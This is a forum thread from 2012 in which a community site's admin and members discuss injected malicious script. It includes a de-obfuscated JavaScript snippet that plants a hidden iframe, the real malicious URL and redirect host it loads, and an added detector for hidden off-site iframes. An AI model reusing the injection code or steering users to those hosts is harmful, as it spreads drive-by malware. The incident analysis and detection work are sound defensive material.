Marsh (Author) - Posted January 7, 2012

As some of you know, we have been experiencing some site issues today. I have done my best to fix the ones that I have noticed thus far, but if anything is displaying errors or working improperly please let me know immediately.

Looks like some of the forum files have been modified without my knowledge to include some odd script. I have changed the password and currently am the only person with access, though I am currently not sure if the changes were made with a login or an exploit. So if anything pops up please PM me.

[Update] Think I found out how they got in. Looks like it was the old Eclipse chan April Fools joke. That thing is crazy outdated and was still running for old times' sake.

[Update 2] Two people so far have reported being infected with a Trojan around the time of the attack. Please scan your computer for viruses. You will most likely not be affected if you were not online at the time the site was acting strangely.

Please download Microsoft Security Essentials or your preferred virus scanner and run a scan.

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Trojan%3aJS%2fBlacoleRef.T&threatid=2147652755

Sorry for the inconvenience. The important thing is we don't blame Eclipse ;)

ark0n - Posted January 7, 2012

Yeah dude, I noticed it, I thought it was just my computer tweaking…

Marsh (Author) - Posted January 7, 2012

Here is the script if anyone wants it.

We are running the latest version of SMF and I have removed any unneeded mods. Hopefully this will prevent any further exploits. But we will see.

Myron - Posted January 7, 2012

Time to do some digging then.

ark0n - Posted January 7, 2012

@Rusher:
> Time to do some digging then.

This hahah

Marsh (Author) - Posted January 7, 2012

Yup, looks like a common enough problem. Just a matter of finding out how they got in. I only updated to the latest SMF a few days back so it may have already been in there.

Myron - Posted January 7, 2012

@Marsh:
> I only updated to the latest SMF a few days back so it may have already been in there.

Would be strange considering that it only 'activated' today.

Marsh (Author) - Posted January 7, 2012

Yea true

Myron - Posted January 7, 2012

BUMP. Please read the updated reply from Marsh.

emblem - Posted January 7, 2012

The script injects an invisible iframe into the site.

Basically de-obfuscated it does this:

```
// Run immediately if <body> already exists, otherwise write a fallback.
if (document.getElementsByTagName('body')[0]) {
  iframer();
} else {
  document.write("");
}

// Build a hidden 10x10 iframe pinned to the top-left corner and append it.
function iframer() {
  var f = document.createElement('iframe');
  f.setAttribute('src', 'SEE SPOILER FOR URL');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}
```

Here's the url it goes to, on two lines. Don't blame me if something happens for visiting it:

>! http://novikkoll.in/in.cgi?default

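A check for the pattern described in the post above, as an added example that is not part of the original thread: it flags iframes that load from another host and are hidden or tiny, the combination the injected script sets. The function names, hostnames and sample frames are constructed for illustration.

```javascript
'use strict';
// Added example (not from the thread). Heuristics mirror the de-obfuscated
// script: hidden, ~10x10 px, absolutely positioned, src on a foreign host.
// Works on DOM elements or any object with getAttribute() and style.

function frameFindings(frame, siteHost) {
  const findings = [];
  const style = frame.style || {};
  const px = (v) => parseInt(v, 10); // "10" or "10px" -> 10, missing -> NaN

  if (style.visibility === 'hidden' || style.display === 'none') {
    findings.push('hidden');
  }
  const w = px(frame.getAttribute('width') ?? style.width);
  const h = px(frame.getAttribute('height') ?? style.height);
  if (w <= 10 && h <= 10) findings.push('tiny'); // NaN compares false
  if (style.position === 'absolute') findings.push('absolute');

  let host = null;
  try {
    host = new URL(frame.getAttribute('src') || '', 'https://' + siteHost).hostname;
  } catch { /* malformed src: reported below */ }
  if (host === null) findings.push('unparseable-src');
  else if (host !== siteHost) findings.push('off-site:' + host);
  return findings;
}

// Report only frames that are off-site AND (hidden OR tiny).
function suspiciousFrames(frames, siteHost) {
  return Array.from(frames)
    .map((f) => ({ src: f.getAttribute('src'), findings: frameFindings(f, siteHost) }))
    .filter(({ findings }) =>
      findings.some((x) => x.startsWith('off-site:')) &&
      (findings.includes('hidden') || findings.includes('tiny')));
}

// Constructed sample frames (hypothetical hosts and paths), standing in for DOM nodes.
const fake = (attrs, style = {}) => ({ getAttribute: (n) => attrs[n] ?? null, style });
const SAMPLE_FRAMES = [
  fake({ src: 'http://injected.example/in.cgi', width: '10', height: '10' },
       { visibility: 'hidden', position: 'absolute', left: '0', top: '0' }),
  fake({ src: 'https://video.example/embed/1', width: '560', height: '315' }),
  fake({ src: '/upload_target.html' }, { display: 'none' }),
];

console.log(suspiciousFrames(SAMPLE_FRAMES, 'forum.example'));
```

In a browser console the same functions can be run as `suspiciousFrames(document.querySelectorAll('iframe'), location.hostname)`; only inline styles are inspected, which is what the injected script sets.
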
Myron - Posted January 7, 2012

Eh, I'll see if I can get a Virtual Machine up to check that site out..

ark0n - Posted January 7, 2012

Good job Scootaloo!

emblem - Posted January 7, 2012

The url seems to redirect to another site then 404 for me, not executing any exploits at all.

Weird. xD

evilbunnie - Posted January 7, 2012

Dude.

Are you sure it's a legit 404?

Marsh (Author) - Posted January 7, 2012

@Scootaloo:
> The url seems to redirect to another site then 404 for me, not executing any exploits at all.
>
> Weird. xD

Yea, redirects to adersersut.com

Which is on some malware site lists as: Directs to Exploit kit

emblem - Posted January 7, 2012

Looks legit, as far as headers and page source.

But I could be wrong. Run the site sandboxed, in a VM on a computer you don't care about that's firewalled on a network that's not related to your personal one.

game_heaven - Posted January 7, 2012

Hello, I'm not sure if this is what caused my problem. My connection was working fine, I was disconnected, and when I logged back in it happened again. No one knows my Eclipse account info.

Justn - Posted January 7, 2012

I always keep this site opened up on my PC and I noticed I kept getting logged out yesterday. Just thought it was me, so I read this and ran my virus scanner and it found 3 traces of a trojan virus. Removed them successfully, hope all is good now =)

EDIT: my anti-malware program keeps blocking that noviak website when I go to the main Eclipse page though =/ I don't like to keep it running 'cause it slows my PC down but I will until it is fixed =p

Whackeddie99 - Posted January 8, 2012

I'll run my virus scanner ASAP

Guest - Posted January 8, 2012

I think I saw the virus was…

It was on www.touchofdeathforums.com/smf/

My KIS (Kaspersky Internet Security) detected it there.

Dreams - Posted January 8, 2012

I got some virus alerts on the site. My first thought = 'Robin's Trying to Steal Our Info!!!'

But as it seems, everything's gonna be ok.

I assume that it is safe to still be here if I have MSE and it seems to be catching the viruses?

Likestodraw - Posted January 8, 2012

Yeah, while on here on two different computers, I've had Security Essentials say that it detected a potential threat. I'm glad it's being cleared up!

Robin - Posted January 8, 2012

@Dreams:
> I got some virus alerts on the site. My first thought = 'Robin's Trying to Steal Our Info!!!'
> But as it seems, everything's gonna be ok.
> I assume that it is safe to still be here if I have MSE and it seems to be catching the viruses?

Your information is worthless to me. I already have everything I'd need if I wanted to sell your personal information.

Dreams - Posted January 8, 2012

Well, what's my social security number?

Robin - Posted January 8, 2012

I have no idea what a social security number is.